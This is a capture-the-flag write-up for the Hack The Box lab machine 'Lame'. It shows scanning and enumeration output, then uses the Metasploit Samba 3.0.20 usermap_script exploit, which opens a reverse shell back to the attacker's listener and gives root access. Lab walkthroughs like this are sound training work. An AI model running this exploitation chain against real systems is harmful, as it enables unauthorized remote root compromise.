Lame

From RCATs

Run an NMap scan with default scripts and version enumeration.

# Nmap 7.93 scan initiated Thu Dec 15 12:10:11 2022 as: nmap -sCV -oA nmap/lame -Pn 10.129.31.107
Nmap scan report for 10.129.31.107
Host is up (0.067s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.16.18
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 600fcfe1c05f6a74d69024fac4d56ccd (DSA)
|_  2048 5656240f211ddea72bae61b1243de8f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 2h30m27s, deviation: 3h32m11s, median: 24s
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name:
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2022-12-15T14:11:01-05:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 15 12:11:12 2022 -- 1 IP address (1 host up) scanned in 61.04 seconds

Nmap mentions ftp with anonymous login. So we check, however, we dont get anything out of it.

❯ ftp anonymous@10.129.30.102
Connected to 10.129.30.102.
220 (vsFTPd 2.3.4)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp>

Run enum4linux-ng to see what we get. First thing I noticed was SMB 1.0: True. However this is a linux box so no eternalblue for us...

...<SNIP>...

=================================
|    SMB Dialect Check on 10.129.30.102    |
 ==========================================[94m[*] Trying on 445/tcp�[0m
�[92m[+] Supported dialects and settings:
Supported dialects:
  SMB 1.0: true
  SMB 2.02: false
  SMB 2.1: false
  SMB 3.0: false
  SMB 3.1.1: false
Preferred dialect: SMB 1.0
SMB1 only: true
SMB signing required: false�[0m
�[94m[*] Enforcing legacy SMBv1 for further enumeration�[0m

...<SNIP>...

Next I noticed the version Samba 3.0.20

 ================================================
|    OS Information via RPC for 10.129.30.102    |
 ================================================[94m[*] Enumerating via unauthenticated SMB session on 445/tcp�[0m
�[92m[+] Found OS information via SMB�[0m
�[94m[*] Enumerating via 'srvinfo'[0m
�[92m[+] Found OS information via 'srvinfo'[0m
�[92m[+] After merging OS information we have the following result:
OS: Linux/Unix (Samba 3.0.20-Debian)
OS version: '4.9'
OS release: not supported
OS build: not supported
Native OS: Unix
Native LAN manager: Samba 3.0.20-Debian
Platform id: '500'
Server type: '0x9a03'
Server type string: Wk Sv PrQ Unx NT SNT lame server (Samba 3.0.20-Debian)[0m

Quick search searchsploit command and we get result. I want to get some more use out of metasploit so lets try that

❯ searchsploit Samba 3.0.20                                                                                            
------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                       |  Path                           
------------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                               | multiple/remote/10095.txt       
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)     | unix/remote/16320.rb            
Samba < 3.0.20 - Remote Heap Overflow                                                | linux/remote/7701.txt           
Samba < 3.6.2 (x86) - Denial of Service (PoC)                                        | linux_x86/dos/36741.py          
------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Works! Root...

msf6 exploit(multi/samba/usermap_script) > exploit                                                                                                                                                                                             
[*] Started reverse TCP handler on 10.10.16.18:4444                                                                                                                                                                                            
[*] Command shell session 1 opened (10.10.16.18:4444 -> 10.129.30.102:43409) at 2022-12-16 17:04:38 -0700        
id                                                                                                                                                                                                                                             
uid=0(root) gid=0(root)